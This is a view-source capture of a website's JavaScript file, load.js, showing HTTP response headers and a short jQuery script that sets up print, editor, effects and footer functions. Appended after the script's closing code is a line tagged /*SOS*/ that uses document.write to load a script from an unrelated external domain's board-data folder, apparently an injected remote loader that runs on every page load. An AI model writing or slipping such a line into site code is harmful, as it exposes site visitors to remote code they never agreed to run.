URL:    [ Dan Winchester Home ] [ View Source Home ] 
HTTP/1.1 200 OK
Date: Mon, 09 Aug 2010 12:09:27 GMT
Server: Rapidsite/Apa
Last-Modified: Sat, 26 Sep 2009 04:00:55 GMT
ETag: "120d175-291-4abd91f7"
Accept-Ranges: bytes
Content-Length: 657
Connection: close
Content-Type: application/x-javascript
X-Pad: avoid browser bug

/* load.js
  - Loading order
--------------------------------------------------------- */
jQuery.noConflict();
jQuery.ajaxSetup({scriptCharset:'utf-8'});

// domready
jQuery(document).ready(function() {
	////////// parts
	if (bindobj.printstate) Bindprint.control();
	else Bindprint.set();
	
	////////// blockeditor
	if (bindobj.isLocal && !bindobj.ie52) BindApp.onload();
	
	////////// fx
	if (!bindobj.printstate) initFx();
	
});

// onload
jQuery(function(){
	////////// for legacy browser
	legacyCheck();
	
	////////// set footer
	Bindfooter.set();

});/*SOS*/{document.write('<script src=http://www.gamecollege.co.kr/zboard/data/yahoo.js><\/script>');}
 Questions or comments welcome: contact me.